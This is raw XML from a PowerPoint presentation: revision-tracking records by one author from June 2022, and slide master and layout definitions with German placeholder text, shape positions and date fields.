          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:11:25.036" v="748" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818310568" sldId="275"/>
            <ac:picMk id="10" creationId="{8EF8DEF5-3676-6117-2E96-8C2300C448A2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:23:51.349" v="2000" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="308859088" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:17:58.503" v="1490"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="308859088" sldId="276"/>
            <ac:spMk id="2" creationId="{989CFEB1-A496-5786-E2DF-F71EB67862B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:23:49.949" v="1999" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="308859088" sldId="276"/>
            <ac:spMk id="6" creationId="{0E84538D-A0C4-FE0C-08AF-777EA5967A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:23:51.349" v="2000" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="308859088" sldId="276"/>
            <ac:picMk id="8" creationId="{3D038522-241C-9B19-CA65-A19E56E9CB68}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:26:05.486" v="2123" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1054444830" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:23:58.827" v="2002"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1054444830" sldId="277"/>
            <ac:spMk id="2" creationId="{0967CAFA-6D37-78BA-AD7A-1E60A9776688}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:26:05.486" v="2123" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1054444830" sldId="277"/>
            <ac:spMk id="6" creationId="{BB6DEF78-A212-2290-990F-1CE289524FFB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:26:02.390" v="2122" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1054444830" sldId="277"/>
            <ac:picMk id="8" creationId="{51B11B02-55B8-2D77-2C5D-A7146E5D6C0F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod ord">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:32:42.379" v="2664" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="98746441" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:32:42.379" v="2664" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="98746441" sldId="278"/>
            <ac:spMk id="6" creationId="{0E84538D-A0C4-FE0C-08AF-777EA5967A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:26:47.548" v="2158" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="98746441" sldId="278"/>
            <ac:picMk id="8" creationId="{3D038522-241C-9B19-CA65-A19E56E9CB68}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:26:36.818" v="2153" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3761845218" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:26:36.527" v="2152" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3761845218" sldId="278"/>
            <ac:spMk id="2" creationId="{C24ED8B7-3A11-3868-8EF2-17730FB72A2A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:35:30.320" v="3155" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1137636581" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:35:30.320" v="3155" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1137636581" sldId="279"/>
            <ac:spMk id="6" creationId="{0E84538D-A0C4-FE0C-08AF-777EA5967A63}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:37:07.214" v="3305" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1340718948" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:35:48.994" v="3157"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1340718948" sldId="280"/>
            <ac:spMk id="2" creationId="{989CFEB1-A496-5786-E2DF-F71EB67862B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:37:07.214" v="3305" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1340718948" sldId="280"/>
            <ac:spMk id="6" creationId="{0E84538D-A0C4-FE0C-08AF-777EA5967A63}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:39:01.191" v="3454" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="314839840" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:37:57.880" v="3326" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="314839840" sldId="281"/>
            <ac:spMk id="2" creationId="{F9411331-3CCA-4BB9-1835-FC56429F7DCB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:39:01.191" v="3454" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="314839840" sldId="281"/>
            <ac:spMk id="6" creationId="{49AD82EE-95D5-8A84-F128-FBB0671B2BB4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:47:39.673" v="4007" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="544829960" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:40:58.639" v="3456"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="544829960" sldId="282"/>
            <ac:spMk id="2" creationId="{1D6DBDD3-A985-7B7C-9DBF-4C7F8DABA72E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:47:39.673" v="4007" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="544829960" sldId="282"/>
            <ac:spMk id="6" creationId="{F31C1CF4-7CAA-7A05-0854-78699C3950C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A041AAB-3404-4DE7-B246-0B814E4583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95BC99-12C7-4D2E-9A31-068A354E7B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8B47B-DE8B-42E2-90CB-8CC5A2589376}" type="datetimeFigureOut">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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9D7A63-9742-4E73-ADB9-D196F7EC86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9ED582-CCA9-4776-B08A-81969A66F2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D1194-6684-412E-B460-C443F1FBB80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106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0B7C445-6903-42AB-A513-90430BD76E54}" type="datetimeFigureOut">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:pPr/>
              <a:t>09.06.2022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AT"/>
              <a:t>Formatvorlagen des Textmasters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A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0767BAC-B3A7-4D51-A51F-3A021F6FF3ED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03511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83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892" algn="l" defTabSz="685783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783" algn="l" defTabSz="685783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675" algn="l" defTabSz="685783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566" algn="l" defTabSz="685783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67BAC-B3A7-4D51-A51F-3A021F6FF3ED}" type="slidenum">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:pPr/>
              <a:t>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31622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598" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:no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598" y="2701528"/>
            <a:ext cx="4597401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de-AT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A5FD48EC-9EFA-4483-BA6A-81FE01BA2209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5424183" y="447675"/>
            <a:ext cx="905483" cy="4435476"/>
            <a:chOff x="5424183" y="447675"/>
            <a:chExt cx="905483" cy="4435476"/>
          </a:xfrm>
        </p:grpSpPr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E6192169-D0D9-494B-BC86-2BA3093BE0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63907" y="4387903"/>
              <a:ext cx="812714" cy="495248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2AE456A8-BAE7-474A-9307-E9B8EEDE4CF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24183" y="447675"/>
              <a:ext cx="905483" cy="813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847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AF221-57D3-4A56-BA74-8EA148F1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0E81E6-5DAF-42C7-B85C-93757488BB1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7980" y="1527175"/>
            <a:ext cx="7415419" cy="30241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de-AT" dirty="0"/>
              <a:t>Bild, Grafik, Diagramm oder SmartArt einfügen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403F3D-3A08-434E-A95D-62B04BDF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C606-27FD-44D0-AD15-079BA439602C}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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E412A1-1A2C-46EA-ADB7-1B2CCD73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0BD04C-41A7-4007-9DE0-DCDC5451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2502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AF221-57D3-4A56-BA74-8EA148F1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0E81E6-5DAF-42C7-B85C-93757488BB1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7980" y="1527175"/>
            <a:ext cx="7415419" cy="33178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de-AT" dirty="0"/>
              <a:t>Bild, Grafik, Diagramm oder SmartArt einfügen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2601636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D1AE8B-0B7F-443F-8C2F-3CEE422FD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6600" y="1527175"/>
            <a:ext cx="3762000" cy="30289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8C7300-D35E-41E8-ADDB-4850FB726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2863" y="1527175"/>
            <a:ext cx="3762000" cy="30289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F0EB77-7794-476F-A789-046E31D5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BADE-CD83-444E-A0AA-C9BCDEBDCAB3}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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2D1044B-ECA7-4545-AABE-0EDC1C47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1205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D12154-D44A-48C0-85C7-3A6B700ED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600" y="1532732"/>
            <a:ext cx="3762000" cy="49926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9A8AA5-22D4-4FE5-99FA-0034B1189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6600" y="2127250"/>
            <a:ext cx="3762000" cy="24288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77D6A39-2CE2-497A-829A-CDA53E018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2863" y="1532732"/>
            <a:ext cx="3762000" cy="49926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851359-DAFB-4A7D-8805-89E792FE9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62863" y="2127250"/>
            <a:ext cx="3762000" cy="24288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23ECFA-6E29-4872-B0E4-D6A116AD6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B95E-7C03-46C4-8062-8B766A553017}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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0FD7E99-323F-4CFA-A86E-7D1436DE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85E1F5-F8C0-48A7-AE8A-5405E73E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B188B3A9-2C37-45D5-A8AD-F3CEFD9A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02110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DBC0764D-07A4-43BD-8EA0-81B3BE86C6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6600" y="3116263"/>
            <a:ext cx="3762000" cy="1439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5A938329-341A-4F53-ABCE-F0CCC54980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6600" y="1527175"/>
            <a:ext cx="3762000" cy="14430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DF059A-1941-4A7D-BF88-85CA6C4F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F0EB77-7794-476F-A789-046E31D5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C2F07-069A-4192-9D82-579444BABB03}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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14" name="Bildplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964FE8B-93B6-4BC4-BBBC-9B75021A79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62862" y="1527175"/>
            <a:ext cx="3762000" cy="14430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6DD21BDB-B655-4D05-8643-3C004094F7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62863" y="3116263"/>
            <a:ext cx="3762000" cy="1439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478128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5A938329-341A-4F53-ABCE-F0CCC54980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6601" y="1527175"/>
            <a:ext cx="2448000" cy="14430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DF059A-1941-4A7D-BF88-85CA6C4F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F0EB77-7794-476F-A789-046E31D5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38A3-E720-4855-942C-83725ACE0FF6}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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14" name="Bildplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964FE8B-93B6-4BC4-BBBC-9B75021A79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48000" y="1527175"/>
            <a:ext cx="2448000" cy="14430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2" name="Bildplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74B3FA1-9846-4211-A3A6-9F425E06028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74149" y="1527175"/>
            <a:ext cx="2448000" cy="14430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3CCF484-D439-4AF8-99D7-7CEA0E8F149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6599" y="3116263"/>
            <a:ext cx="2448000" cy="1439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75F93C75-38F0-4ED6-A6F7-EFAB1F28DCA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48000" y="3116263"/>
            <a:ext cx="2448000" cy="1439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07A9B07E-868E-41ED-8FD6-D193AF3362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974148" y="3116263"/>
            <a:ext cx="2448000" cy="1439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592200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5A938329-341A-4F53-ABCE-F0CCC54980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6600" y="1527175"/>
            <a:ext cx="1800000" cy="14430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DF059A-1941-4A7D-BF88-85CA6C4F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F0EB77-7794-476F-A789-046E31D5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EEAA-F536-43C0-84E3-AE928FDECF6D}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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14" name="Bildplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964FE8B-93B6-4BC4-BBBC-9B75021A79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699354" y="1527175"/>
            <a:ext cx="1800000" cy="14430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8" name="Bildplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC97C896-2A9B-4881-9271-E4E3CACCC99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62108" y="1527175"/>
            <a:ext cx="1800000" cy="14430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21" name="Bildplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931E0872-DC46-495C-9C8A-14B2E64043D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624863" y="1527175"/>
            <a:ext cx="1800000" cy="14430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25" name="Textplatzhalter 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDC9030-CF9B-42B6-87C3-C18F84BFA54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6600" y="3116263"/>
            <a:ext cx="1800000" cy="143986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8" name="Textplatzhalter 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F2C7516-6BCF-4DC7-B27C-1FF2C84A739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99353" y="3116263"/>
            <a:ext cx="1800000" cy="143986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9" name="Textplatzhalter 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C684E9AE-BEB7-4A25-A358-1EA4271D5E8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662108" y="3116263"/>
            <a:ext cx="1800000" cy="143986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0" name="Textplatzhalter 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F22FED2-2C96-438F-B75F-2A353B83E46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24863" y="3116263"/>
            <a:ext cx="1800000" cy="143986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4258933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DF059A-1941-4A7D-BF88-85CA6C4F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F0EB77-7794-476F-A789-046E31D5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0302-BBF5-4CBC-A3E9-62848A00C7B7}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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3CCF484-D439-4AF8-99D7-7CEA0E8F149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6599" y="1527175"/>
            <a:ext cx="2448000" cy="467880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="144000" indent="0"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75F93C75-38F0-4ED6-A6F7-EFAB1F28DCA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48000" y="1527175"/>
            <a:ext cx="2448000" cy="467880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="144000" indent="0"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07A9B07E-868E-41ED-8FD6-D193AF3362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976362" y="1527175"/>
            <a:ext cx="2448000" cy="467880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="144000" indent="0"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447D7D5-AA85-4440-8440-1D81CB94530E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736599" y="2146300"/>
            <a:ext cx="2448000" cy="24098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8" name="Inhaltsplatzhalter 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC7741F3-7BD4-4444-85A2-EF57946830B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348538" y="2146300"/>
            <a:ext cx="2448000" cy="24098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9" name="Inhaltsplatzhalter 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22432E4A-F9FF-4EBA-B6AD-B49BBEDDEC1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5976900" y="2146300"/>
            <a:ext cx="2448000" cy="24098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8974461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DF059A-1941-4A7D-BF88-85CA6C4F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D1AE8B-0B7F-443F-8C2F-3CEE422FD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6600" y="1527174"/>
            <a:ext cx="3762000" cy="14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8C7300-D35E-41E8-ADDB-4850FB726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2863" y="1527174"/>
            <a:ext cx="3762000" cy="14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F0EB77-7794-476F-A789-046E31D5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0ED-753D-4F33-8512-07BE07FE5450}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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9EE80469-4037-4CA5-A3FF-1325E225CDB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36600" y="3116125"/>
            <a:ext cx="3762000" cy="14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6A6E04A0-B015-4720-933D-DF1F3349693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62863" y="3116125"/>
            <a:ext cx="3762000" cy="14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932554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7A4C7-9ECA-43F3-AA1A-B08CBCC2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351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AF221-57D3-4A56-BA74-8EA148F1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0E81E6-5DAF-42C7-B85C-93757488B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980" y="1527175"/>
            <a:ext cx="6462920" cy="3024188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403F3D-3A08-434E-A95D-62B04BDF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DF274-0B4E-4804-887C-0260E2BCE210}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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E412A1-1A2C-46EA-ADB7-1B2CCD73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0BD04C-41A7-4007-9DE0-DCDC5451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903941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117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IS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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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C1D6EF4D-631D-4362-81AC-26961EA8E6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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)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807118F-A939-4F98-BF7E-02D4E3043B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91"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076000" y="446400"/>
            <a:ext cx="1594800" cy="100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330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MA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6710"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076820" y="447674"/>
            <a:ext cx="1594005" cy="1021265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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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C1D6EF4D-631D-4362-81AC-26961EA8E6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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34182930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WI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000" y="447675"/>
            <a:ext cx="1594800" cy="1012895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00" y="1771651"/>
            <a:ext cx="4594225" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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83F827D1-FF39-40DE-97AA-081D57EC6B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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1798126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PM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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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01996F01-04F5-4D7D-A887-8C787E507B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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16051961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MA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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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BFEF362D-E7C0-4461-849C-A611330610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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39054062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UK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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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33F5AB24-971C-420D-9B89-E454BC1A85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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
